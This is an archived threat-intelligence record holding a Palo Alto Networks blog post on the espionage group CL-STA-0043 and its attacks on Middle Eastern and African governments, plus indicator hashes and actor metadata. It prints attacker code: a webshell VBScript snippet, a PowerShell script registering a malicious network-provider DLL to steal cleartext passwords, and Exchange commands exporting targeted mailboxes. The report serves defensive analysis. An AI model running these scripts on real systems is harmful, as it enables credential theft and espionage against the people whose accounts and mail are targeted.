{ "id": "7e49240a-ecfd-4ad6-a2f4-f2fb8dec4ae0", "created_at": "2026-04-06T00:18:38.078019Z", "updated_at": "2026-04-10T03:36:33.420673Z", "deleted_at": null, "sha1_hash": "8eb1aad0a59cc87d75b72ef46861567e73b13c00", "title": "Through the Cortex XDR Lens: Uncovering a New Activity Group Targeting Governments in the Middle East and Africa - Palo Alto Networks Blog", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1697811, "plain_text": "Through the Cortex XDR Lens: Uncovering a New Activity Group\r\nTargeting Governments in the Middle East and Africa - Palo Alto\r\nNetworks Blog\r\nBy By Lior Rochberger\r\nPublished: 2023-06-14 · Archived: 2026-04-02 11:51:51 UTC\r\nThis post is also available in:\r\nExecutive Summary\r\nThe Cortex Threat Research team has recently identified multiple espionage attacks targeting governmental entities in the\r\nMiddle East and Africa. According to our findings, the main goal of the attacks was to obtain highly confidential and\r\nsensitive information, specifically related to politicians, military activities, and ministries of foreign affairs.\r\nThe attacks, which happened around the same time frame, shared several very unique similarities in tactics, techniques, and\r\nprocedures (TTPs), with some of them never reported before in the wild, while other techniques are relatively rare, with\r\njust a handful of attackers reported using them.\r\nWe currently track the activity group behind the attacks as CL-STA-0043. This activity group’s level of sophistication,\r\nadaptiveness, and victimology suggest a highly capable APT threat actor, and it is suspected to be a nation-state threat\r\nactor.\r\nWhile tracking and analyzing CL-STA-0043, we discovered new evasive techniques and tools used by the attackers, such\r\nas an in-memory VBS implant to run webshell clandestinely, as well as a rare credential theft technique first seen in the\r\nwild.\r\nPerhaps one of the most interesting findings of this investigation is the rare and novel Exchange email exfiltration\r\ntechnique that was used by the attackers only on a few selected targets, according to our telemetry.\r\nIn this blog post, we will provide information regarding the various TTPs observed in the attacks, including the execution\r\nas shown through the lens of the Palo Alto Networks Cortex XDR product.\r\nTable of Contents\r\nExecutive Summary\r\nTable of Contents\r\nInfection Vector: An In-Memory VBS Implant\r\nReconnaissance\r\nPrivilege Escalation\r\nThe Potato Suite\r\nhttps://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/\r\nPage 1 of 14\n\nSticky Keys Attack is Making a Comeback\r\nIislpe IIS PE\r\nCredential Theft: Using Network Providers To Steal Credentials\r\nLateral Movement\r\nDebuting Yasso: A New Penetration Toolset\r\nAdditional Lateral Movement TTPs\r\nExfiltration: Stealing Targeted Email Data\r\nAbusing of the Exchange Management Shell\r\nAdd PowerShell snap-in (PSSnapins) to steal emails\r\nConclusion\r\nProtections and Mitigations\r\nIndicators Of Compromise\r\nAdditional Resources\r\nInfection Vector: An In-Memory VBS Implant\r\nIn the past couple of years, multiple zero-day exploits in on-premises IIS and Microsoft Exchange Servers led to a growing\r\ntrend of exploiting these servers to gain an initial access to target networks.\r\nIn most cases, the main post exploitation method observed in such attacks is to deploy various kinds of webshell, which\r\nprovide the attackers access to the compromised network via a remote shell.\r\nDuring an investigation of one of the instances, we observed a series of failed attempts to execute the infamous China\r\nChopper webshell, which were blocked by the Cortex XDR anti-webshell module. In the following days after the failed\r\nattempts, we observed a new suspicious activity originating from the Exchange Server’s w3wp.exe process, which upon\r\ninvestigation appeared to be resulting from an in-memory VBscript implant deployed by the threat actor. The activity was\r\nalso detected by Cortex XDR.\r\nhttps://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/\r\nPage 2 of 14\n\nFigure 1. Detection of the Suspicious AMSI decode attempt, as shown in Cortex XDR.\r\nBelow is a snippet of the in-memory VBscript:\r\nhttps://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/\r\nPage 3 of 14\n\n\"request.Item(\"\"\u003credacted\u003e\"\");\r\nIStringList.Item();\r\nIServer.ScriptTimeout(\"\"3600\"\");\r\nIServer.CreateObject(\"\"Scripting.Dictionary\"\");\r\nIRequest.Form(\"\"key\"\");\r\nIStringList.Item();\r\nISessionObject.Value(\"\"payload\"\");\r\nIXMLDOMNode._00000029(\"\"base64\"\");\r\nIXMLDOMElement.dataType(\"\"bin.base64\"\");\r\nIXMLDOMElement.text(\"\"\u003credacted\u003e\"\");\r\nIXMLDOMElement.nodeTypedValue();\r\nISessionObject.Value(\"\"payload\"\");\r\nIDictionary.Add(\"\"payload\"\", \"\"Set Parameters=Server.CreateObject(\"\"Scripting.Dictionary\"\")\r\nFunction Base64Encode(sText)\r\nDim oXML, oNode\r\ni\"\");\r\nIDictionary.Item(\"\"payload\"\");\r\nIServer.CreateObject(\"\"Scripting.Dictionary\"\");\r\n_Stream.Charset(\"\"iso-8859-1\"\");\r\n_Stream.Type(\"\"1\"\");\r\n_Stream.Open();\r\n_Stream.Write(\"\"Unsupported parameter type 00002011\"\");\r\n\u003csnipped code\u003e\r\n_Stream.ReadText();\r\nIServer.CreateObject(\"\"WScript.shell\"\");\r\nIWshShell3._00000000();\r\nIWshShell3.Exec(\"\"cmd /c \"\"cd /d \"\"C:/\u003credacted\u003e/\"\"\u0026ipconfig /all\"\" 2\u003e\u00261\"\");\"\r\nhttps://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/\r\nPage 4 of 14\n\nReconnaissance\r\nOnce the attackers had penetrated the network, they performed reconnaissance activity, mapping out the network and\r\nidentifying critical assets. The attackers were mainly focused on finding administrative accounts and identifying important\r\nservers, such as:\r\nDomain controllers\r\nWeb servers\r\nExchange servers\r\nFTP servers\r\nSQL databases\r\nTo get this information, the attackers tried to execute the following tools:\r\nLadon web scanning tool (authored by “k8gege”)\r\nCustom network scanners\r\nNbtscan\r\nPortscan\r\nWindows commands: Netstat, nslookup, net, ipconfig, tasklist, quser\r\nFigure 2. Prevention of multiple tools by the Cortex XDR \u0026 XSIAM\r\nhttps://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/\r\nPage 5 of 14\n\nPrivilege Escalation\r\nThe Potato Suite\r\nIn order to carry out the attacks successfully, the threat actors needed to run their tools and commands with adequate\r\nprivileges (admin/system). To do so, they made use of different tools from the trending Potato suite. The Potato suite is a\r\ncollection of various native Windows privilege escalation tools. The main tools that were observed during the investigation\r\nwere:\r\nJuicyPotatoNG - a local privilege escalation tool, from a Windows service account to NT AUTHORITY\\SYSTEM.\r\nIt is based on RottenPotatoNG.\r\nSharpEfsPotato - a local privilege escalation tool using EfsRpc, built from SweetPotato.\r\nUsing those tools, the threat actor attempted to create administrative accounts, and to run various tools that require elevated\r\nprivileges.\r\nFigure 3. Prevention of JuicyPotatoNG by the Cortex XDR \u0026 XSIAM WildFire module\r\nSticky Keys Attack is Making a Comeback\r\nAnother technique that we observed during the attacks was the well-known privilege escalation technique called “Sticky\r\nKeys”.\r\nThe Windows operating system contains accessibility features that may be launched with a key combination before a user\r\nhas logged in to the system, or by an unprivileged user. An attacker can modify the way these programs are launched to get\r\na command prompt or a backdoor.\r\nOne of the common accessibility features is sethc.exe, which is often referred to as “Sticky Keys”. In the attack, the\r\nattacker usually replaces the sethc.exe binary or pointers/references to these binaries in the registry, with cmd.exe. When\r\nexecuted, it provides an elevated command prompt shell to the attacker to run arbitrary commands and other tools.\r\nThere were multiple observed attempts to edit the registry key for sethc.exe to point to cmd.exe and subsequently run the\r\nsethc.exe file with the parameter “211”. This turns on the system’s “Sticky Keys” feature which in return executes the\r\nelevated command prompt shell.\r\nhttps://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/\r\nPage 6 of 14\n\nFigure 4. Prevention of Sticky Key attack by the Cortex XDR \u0026 XSIAM\r\nIislpe IIS PE\r\nIn addition, the attackers used a privilege escalation tool “Iislpe.exe”, which is an IIS privilege escalation tool, written by\r\n“k8gege”, the same author who created the aforementioned Ladon tool.\r\nCredential Theft: Using Network Providers To Steal Credentials\r\nIn the attacks clustered under the CL-STA-0043 activity group, there were many techniques and tools deployed aiming to\r\nsteal credentials, such as Mimikatz, Dumping the Sam key, Forcing WDigest to store credentials in plaintext and Dumping\r\nNTDS.dit file from the Active Directory using ntdsutil.exe. These techniques are all well-known and documented.\r\nHowever, one technique did stand out, since it was only first reported as a POC (Proof of Concept) in August 2022, and up\r\nto the time of writing this report, there were no public mentions of this technique being exploited in the wild.\r\nUsing this method, the attackers executed a PowerShell script that registered a new network provider, named “ntos”, set to\r\nexecute a malicious DLL, ntos.dll, dropped by the attacker in the C:\\Windows\\system32 folder.\r\n$path = Get-ItemProperty -Path \"\"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\NetworkProvider\\Order\"\" -\r\nName PROVIDERORDER\r\n$UpdatedValue = $Path.PROVIDERORDER + \"\",ntos\"\"\r\nSet-ItemProperty -Path $Path.PSPath -Name \"\"PROVIDERORDER\"\" -Value $UpdatedValue\r\nNew-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\ntos\r\nNew-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\ntos\\NetworkProvider\r\nNew-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\ntos\\NetworkProvider -Name\r\n\"\"Class\"\" -Value 2\r\nNew-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\ntos\\NetworkProvider -Name\r\n\"\"Name\"\" -Value ntos\r\nNew-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\ntos\\NetworkProvider -Name\r\n\"\"ProviderPath\"\" -PropertyType ExpandString -Value \"\"%SystemRoot%\\System32\\ntos.dll\"\"\r\nAs part of the login activity, Winlogon.exe captures the user and password and forwards them to mpnotify.exe, which loads\r\nthe malicious DLL and shares the cleartext passwords with it. The malicious DLL then creates a new file, containing the\r\nstolen credentials. This file is then sent to the command and control server (C2) of the attackers.\r\nhttps://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/\r\nPage 7 of 14\n\nFigure 5. Prevention of the credential theft attempt, as shown in Cortex XDR \u0026 XSIAM.\r\nLateral Movement\r\nDebuting Yasso: A New Penetration Toolset\r\nAs part of the investigation of the activity in CL-STA-0043, we observed the use of a relatively new penetration testing\r\ntoolset - “Yasso”. Interestingly, although this tool has been publicly available since January 2022, and at the time of this\r\nreport, there were no publicly reported cases where this tool was used in the wild.\r\nYasso, authored by a Mandarin-speaking pentester nicknamed Sairson, is an open source multi-platform intranet-assisted\r\npenetration toolset that brings together a number of features such as scanning, brute forcing, remote interactive shell, and\r\nrunning arbitrary commands.\r\nIn addition, Yasso has powerful SQL penetration functions, and it provides a range of database functionalities for the\r\noperator to perform remote actions.\r\nFigure 6. Yasso command line tool.\r\nThe following Yasso modules were most in use during the attacks:\r\nSMB – SMB Service blowup module\r\nWinrm – Winrm service blowup module\r\nSSH – SSH service burst module, fully interactive shell connection\r\nMSSQL – SQL Server service blowup module and powerlifting auxiliary module\r\nThe use of the different Yasso modules were detected in the Cortex XDR \u0026 XSIAM product, as shown in Figure 7.\r\nhttps://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/\r\nPage 8 of 14\n\nFigure 7. Detection of the Yasso tool execution, as shown in Cortex XDR \u0026 XSIAM.\r\nThose modules, in combination with text files that contain target endpoints, usernames and passwords, were used to\r\nperform a NTLM spray attack. In this attack, the attacker tried to log in to multiple servers using different combinations of\r\nmultiple users and passwords in a short period of time. Cortex XDR \u0026 XSIAM’s Identity Analytics module detected the\r\nanomaly and raised multiple alerts for the suspicious behavior, as shown in Figure 8.\r\nFigure 8. Detection by the Identity Analytics module of the NTLM spray attack, as shown in Cortex XDR \u0026\r\nXSIAM.\r\nAdditional Lateral Movement TTPs\r\nBesides the use of Yasso for lateral movement, the attackers were also observed using other common and known techniques\r\nto accomplish that.\r\nThe tools observed were mostly native Windows tools such as WMI, Scheduled task, Winrs and Net. In addition, the use of\r\nSamba SMBclient for lateral movement was observed in some instances.\r\nExfiltration: Stealing Targeted Email Data\r\nOne of the most interesting techniques observed in the attacks was the targeted data exfiltration method from the\r\ncompromised Exchange servers. A variation of this technique was reported before to be used by Hafnium. This activity\r\nhttps://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/\r\nPage 9 of 14\n\nconsists of abusing the Exchange Management Shell or PowerShell scripts in order to steal emails and PST files according\r\nto specific keywords that the threat actors deem important.\r\nTo gather those emails, two very unique methods were observed:\r\nAbuse of the Exchange Management Shell\r\nAdd PowerShell snap-in (PSSnapins) to steal emails through a script\r\nFigure 9. Prevention of the Exchange management shell abuse, as shown in Cortex XDR \u0026 XSIAM.\r\nAbusing of the Exchange Management Shell\r\nIn the first method, we observed the abuse of the Exchange Management Shell (exshell.psc1) to run a command that saved\r\nall emails from users that contain the string “foreign” and all emails sent from or to governmental accounts, into csv files.\r\npowershell.exe -psconsolefile \"C:\\Program files\\microsoft\\exchange server\\v15\\bin\\exshell.psc1\" -command\r\n\"get-mailbox -Filter \\\"UserPrincipalName -Like \\\"*foreign*\\\"\\\" -ResultSize Unlimited | get-mailboxstatistics |\r\nsort-object TotalItemSize -Descending | Select-Object DisplayName,Alias,TotalItemSize -First 30 | export-csv\r\nc:\\users\\public\\\u003credacted\u003e\\\u003credacted\u003e.csv\"\r\npowershell.exe -psconsolefile \"C:\\Program files\\microsoft\\exchange server\\v15\\bin\\exshell.psc1\" -command\r\n\"Get-MessageTrackingLog -ResultSize Unlimited | Where-Object {$_.Recipients -like \\\"*@\u003credacted\u003e.gov.\r\n\u003credacted\u003e\\\"}| select-object Sender,{$_.Recipients},{$_.MessageSubject} | export-csv c:\\users\\public\\\u003credacted\u003e\\\r\n\u003credacted\u003e.csv\"\r\npowershell.exe -psconsolefile \"C:\\Program files\\microsoft\\exchange server\\v15\\bin\\exshell.psc1\" -command\r\n\"Get-MessageTrackingLog -ResultSize Unlimited | Where-Object {$_.sender -like \\\"*@\u003credacted\u003e.gov.\r\n\u003credacted\u003e\\\"}| select-object Sender,{$_.Recipients},{$_.MessageSubject} | export-csv c:\\users\\public\\\u003credacted\u003e\\\r\n\u003credacted\u003e.csv\"\r\nIn addition to the command lines above, other searches for specific content (using the filter “($_.MessageSubject -like '*\r\n\u003credacted\u003e*')”) were observed as well. Those searches were for very specific individuals and information related to highly\r\nsensitive stately and foreign policy matters.\r\nAdd PowerShell snap-in (PSSnapins) to steal emails\r\nIn the second method, we observed the execution of multiple PowerShell scripts that add PowerShell snap-ins of Exchange,\r\nto allow the attackers to manage the Exchange server and steal emails.\r\nBelow is a snippet of the script which originally contained over 30 targeted mailboxes of individuals, embassies, military-related organizations, and others.\r\nhttps://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/\r\nPage 10 of 14\n\n\\r\\n$date=(Get-Date).AddDays(-3);\\r\\n$server=$env:computername;\\r\\n$path=\\\"\\\\\\\\\\\\\\\\$server\\\\\\\\c$\\\\\\\\users\\\\\\\\public\\\\\\\\libraries\\\\\\\\\\\"\r\n+ [Guid]::newGuid().ToString();\\r\\nmkdir $path;\\r\\nAdd-PSSnapin\r\nMicrosoft.Exchange.Management.Powershell.E2010;\\r\\n$culture =\r\n[System.Globalization.CultureInfo]::CreateSpecificCulture(\\\"en-US\\\");\\r\\n$culture.NumberFormat.NumberDecimalSeparator =\r\n\\\".\\\";\\r\\n$culture.NumberFormat.NumberGroupSeparator =\r\n\\\",\\\";\\r\\n[System.Threading.Thread]::CurrentThread.CurrentCulture = $culture;\\r\\n$filter = \\\"(Received -\r\nge'$date') -or (Sent -ge'$date')\\\";\\r\\nNew-MailboxExportRequest -Name Request1 -Mailbox '\u003credacted\u003e.atlanta' -\r\nContentFilter $filter -FilePath \\\"$path\\\\\\\\\u003credacted\u003e.atlanta.pst\\\";\\r\\nNew-MailboxExportRequest -Name Request2\r\n-Mailbox '\u003credacted\u003e.Kuwait' -ContentFilter $filter -FilePath \\\"$path\\\\\\\\\u003credacted\u003e.Kuwait.pst\\\";\\r\\nNew-MailboxExportRequest -Name Request3 -Mailbox '\u003credacted\u003e.Ankara' -ContentFilter $filter -FilePath \\\"$path\\\\\\\\\r\n\u003credacted\u003e.Ankara.pst\\\";\\r\\nNew-MailboxExportRequest -Name Request4 -Mailbox '\u003credacted\u003e.Paris' -\r\nContentFilter $filter -FilePath \\\"$path\\\\\\\\\u003credacted\u003e.Paris.pst\\\";\\r\\nNew-MailboxExportRequest -Name Request5 -\r\nMailbox 'permanentsecretary' -ContentFilter $filter -FilePath \\\"$path\\\\\\\\permanentsecretary.pst\\\";\\r\\n# New-MailboxExportRequest -Name Request6 -Mailbox '\u003credacted\u003e Press Office' -ContentFilter $filter -FilePath\r\n\\\"$path\\\\\\\\\u003credacted\u003e.Press.Office.pst\\\";\r\nThe output of those scripts were saved into .tiff files, under “c:\\users\\public\\\u003credacted\u003e”, which were later compressed,\r\npassword-protected and sent to the attacker’s C2 server as well.\r\nFigure 10. Exchange management shell abuse, as shown in Cortex XDR \u0026 XSIAM.\r\nFigure 11. Identity analytics alert for 7zip process accessing outlook files, as shown in the Cortex XDR \u0026\r\nXSIAM.\r\nhttps://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/\r\nPage 11 of 14\n\nConclusion\r\nIn this blog, we uncovered several previously unreported and rare techniques and tools observed used by a cluster of\r\nactivity we refer to as CL-STA-0043. While the research is still ongoing, and the full identity of the threat actor/s is still\r\nbeing studied, we believe that the level of sophistication, determination and espionage motives demonstrated in this report,\r\nbear the hallmarks of a true advanced persistent threat, potentially operating on behalf of nation-state interests. In the same\r\nvein, this sheds light on how threat actors seek to obtain non-public and confidential information about geopolitical related\r\ntopics and high-ranking public service individuals.\r\nProtections and Mitigations\r\nDuring the attacks, Cortex XDR \u0026 XSIAM raised many alerts for the malicious activities observed in CL-STA-0043.\r\nPrevention and detection alerts were raised for each phase of the attack: the initial access attempts, the use of rare tools and\r\nthe advanced technique, and for the data exfiltration attempts.\r\nSmartScore, a unique ML-driven scoring engine that translates security investigation methods and their associated data into\r\na hybrid scoring system, scored this incident a 100 score - the highest level of risk.\r\nFigure 12. SmartScore information about the incident\r\nFor Palo Alto Networks customers, our products and services provide the following coverage associated with this group:\r\nCortex XDR detects user and credential-based threats by analyzing user activity from multiple data sources including\r\nendpoints, network firewalls, Active Directory, identity and access management solutions, and cloud workloads. It builds\r\nhttps://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/\r\nPage 12 of 14\n\nbehavioral profiles of user activity over time with machine learning. By comparing new activity to past activity, peer\r\nactivity, and the expected behavior of the entity, Cortex XDR detects anomalous activity indicative of credential-based\r\nattacks.\r\nIt also offers the following protections related to the attacks discussed in this post:\r\nPrevents the execution of known malicious malware and also prevents the execution of unknown malware using\r\nBehavioral Threat Protection and machine learning based on the Local Analysis module.\r\nProtects against credential gathering tools and techniques using the new Credential Gathering Protection available\r\nfrom Cortex XDR 3.4.\r\nProtects from threat actors dropping and executing commands from webshells using Anti Webshell Protection,\r\nnewly released in Cortex XDR 3.4.\r\nProtects against exploitation of different vulnerabilities including ProxyShell and ProxyLogon using the Anti-Exploitation modules as well as Behavioral Threat Protection.\r\nCortex XDR Pro detects post-exploit activity, including credential-based attacks, with behavioral analytics.\r\nIf you think you may have been impacted or have an urgent matter, get in touch with the Unit 42 Incident Response team or\r\ncall:\r\nNorth America Toll-Free: 866.486.4842 (866.4.UNIT42)\r\nEMEA: +31.20.299.3130\r\nAPAC: +65.6983.8730\r\nJapan: +81.50.1790.0200\r\nIndicators Of Compromise\r\nYasso\r\n6b37aec6253c336188d9c8035e90818a139e3425c6e590734f309bd45021f980\r\nCredential Dumping Tool (sam.exe)\r\n77a3fa80621af4e1286b9dd07edaa37c139ca6c18e5695bc9b2c644a808f9d60\r\niislpe.exe\r\n73b9cf0e64be1c05a70a9f98b0de4925e62160e557f72c75c67c1b8922799fc4\r\nSMBexec\r\nE781ce2d795c5dd6b0a5b849a414f5bd05bb99785f2ebf36edb70399205817ee\r\nnbtscan\r\n0f22e178a1e1d865fc31eb5465afbb746843b223bfa0ed1f112a02ccb6ce3f41\r\nLadon\r\n291bc4421382d51e9ee42a16378092622f8eda32bf6b912c9a2ce5d962bcd8f4\r\nhttps://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/\r\nPage 13 of 14\n\naa99ae823a3e4c65969c1c3aa316218f5829544e4a433a4bab9f21df11d16154\r\nddcf878749611bc8b867e99d27f0bb8162169a8596a0b2676aa399f0f12bcbd7\r\nntos.dll\r\nbcd2bdea2bfecd09e258b8777e3825c4a1d98af220e7b045ee7b6c30bf19d6df\r\nAdditional Resources\r\nHunting for the Recent Attacks Targeting Microsoft Exchange\r\nStopping “PowerShell without PowerShell” Attacks\r\nDetecting Credential Stealing with Cortex XDR\r\nCredential Gathering From Third-Party Software\r\nAnalyzing Attacks Against Microsoft Exchange Server With China Chopper Webshells\r\nTHOR: Previously Unseen PlugX Variant Deployed During Microsoft Exchange Server Attacks by PKPLUG Group\r\nhttps://broadcom-software.security.com/blogs/threat-intelligence/witchetty-steganography-espionage\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nhttps://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\r\nSource: https://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/\r\nhttps://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY", "ETDA" ], "references": [ "https://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/" ], "report_names": [ "through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa" ], "threat_actors": [ { "id": "faa4a29b-254a-45bd-b412-9a1cbddbd5e3", "created_at": "2022-10-25T16:07:23.80111Z", "updated_at": "2026-04-10T02:00:04.753677Z", "deleted_at": null, "main_name": "LookBack", "aliases": [ "FlowingFrog", "LookBack", "LookingFrog", "TA410", "Witchetty" ], "source_name": "ETDA:LookBack", "tools": [ "FlowCloud", "GUP Proxy Tool", "SodomMain", "SodomMain RAT", "SodomNormal" ], "source_id": "ETDA", "reports": null }, { "id": "93542ae8-73cb-482b-90a3-445a20663f15", "created_at": "2022-10-25T16:07:24.058412Z", "updated_at": "2026-04-10T02:00:04.853499Z", "deleted_at": null, "main_name": "PKPLUG", "aliases": [ "Stately Taurus" ], "source_name": "ETDA:PKPLUG", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "7c969685-459b-4c93-a788-74108eab6f47", "created_at": "2023-01-06T13:46:39.189751Z", "updated_at": "2026-04-10T02:00:03.241102Z", "deleted_at": null, "main_name": "HAFNIUM", "aliases": [ "Red Dev 13", "Silk Typhoon", "MURKY PANDA", "ATK233", "G0125", "Operation Exchange Marauder" ], "source_name": "MISPGALAXY:HAFNIUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9ffcbb0c-7a0f-419f-a174-f18a02ce47f1", "created_at": "2023-01-06T13:46:39.059774Z", "updated_at": "2026-04-10T02:00:03.199867Z", "deleted_at": null, "main_name": "TA410", "aliases": [], "source_name": "MISPGALAXY:TA410", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ffc66b49-9396-46af-966f-9376c4315f32", "created_at": "2023-11-21T02:00:07.339061Z", "updated_at": "2026-04-10T02:00:03.462317Z", "deleted_at": null, "main_name": "CL-STA-0043", "aliases": [ "TGR-STA-0043" ], "source_name": "MISPGALAXY:CL-STA-0043", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3e8f802c-efba-45ff-8844-5ea4e4a5297d", "created_at": "2023-11-07T02:00:07.092751Z", "updated_at": "2026-04-10T02:00:03.404589Z", "deleted_at": null, "main_name": "Witchetty", "aliases": [ "LookingFrog" ], "source_name": "MISPGALAXY:Witchetty", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2704d770-43b4-4bc4-8a5a-05df87416848", "created_at": "2022-10-25T15:50:23.306305Z", "updated_at": "2026-04-10T02:00:05.296581Z", "deleted_at": null, "main_name": "HAFNIUM", "aliases": [ "HAFNIUM", "Operation Exchange Marauder", "Silk Typhoon" ], "source_name": "MITRE:HAFNIUM", "tools": [ "Tarrask", "ASPXSpy", "Impacket", "PsExec", "China Chopper" ], "source_id": "MITRE", "reports": null }, { "id": "cff2cedd-a198-4e79-ae67-19048084ae7f", "created_at": "2024-06-20T02:02:09.945126Z", "updated_at": "2026-04-10T02:00:04.79991Z", "deleted_at": null, "main_name": "Operation Diplomatic Specter", "aliases": [ "CL-STA-0043", "TGR-STA-0043" ], "source_name": "ETDA:Operation Diplomatic Specter", "tools": [ "Agent Racoon", "Agent.dhwf", "AngryRebel", "CHINACHOPPER", "China Chopper", "Destroy RAT", "DestroyRAT", "Farfli", "Gh0st RAT", "Ghost RAT", "HTran", "HUC Packet Transmit Tool", "JuicyPotatoNG", "Kaba", "Korplug", "LadonGo", "Mimikatz", "Mimilite", "Moudour", "Mydoor", "NBTscan", "Ntospy", "PCRat", "PlugX", "RedDelta", "SharpEfsPotato", "SinoChopper", "Sogu", "SweetSpecter", "TIGERPLUG", "TVT", "Thoper", "TunnelSpecter", "Xamtrav", "Yasso", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "529c1ae9-4579-4245-86a6-20f4563a695d", "created_at": "2022-10-25T16:07:23.702006Z", "updated_at": "2026-04-10T02:00:04.71708Z", "deleted_at": null, "main_name": "Hafnium", "aliases": [ "G0125", "Murky Panda", "Red Dev 13", "Silk Typhoon" ], "source_name": "ETDA:Hafnium", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "2ee03999-5432-4a65-a850-c543b4fefc3d", "created_at": "2022-10-25T16:07:23.882813Z", "updated_at": "2026-04-10T02:00:04.776949Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Bronze President", "Camaro Dragon", "Earth Preta", "G0129", "Hive0154", "HoneyMyte", "Mustang Panda", "Operation SMUGX", "Operation SmugX", "PKPLUG", "Red Lich", "Stately Taurus", "TEMP.Hex", "Twill Typhoon" ], "source_name": "ETDA:Mustang Panda", "tools": [ "9002 RAT", "AdFind", "Agent.dhwf", "Agentemis", "CHINACHOPPER", "China Chopper", "Chymine", "ClaimLoader", "Cobalt Strike", "CobaltStrike", "DCSync", "DOPLUGS", "Darkmoon", "Destroy RAT", "DestroyRAT", "Farseer", "Gen:Trojan.Heur.PT", "HOMEUNIX", "Hdump", "HenBox", "HidraQ", "Hodur", "Homux", "HopperTick", "Hydraq", "Impacket", "Kaba", "Korplug", "LadonGo", "MQsTTang", "McRAT", "MdmBot", "Mimikatz", "NBTscan", "NetSess", "Netview", "Orat", "POISONPLUG.SHADOW", "PUBLOAD", "PVE Find AD Users", "PlugX", "Poison Ivy", "PowerView", "QMAGENT", "RCSession", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Sogu", "TIGERPLUG", "TONEINS", "TONESHELL", "TVT", "TeamViewer", "Thoper", "TinyNote", "WispRider", "WmiExec", "XShellGhost", "Xamtrav", "Zupdax", "cobeacon", "nbtscan", "nmap", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434718, "ts_updated_at": 1775792193, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/8eb1aad0a59cc87d75b72ef46861567e73b13c00.pdf", "text": "https://archive.orkl.eu/8eb1aad0a59cc87d75b72ef46861567e73b13c00.txt", "img": "https://archive.orkl.eu/8eb1aad0a59cc87d75b72ef46861567e73b13c00.jpg" } }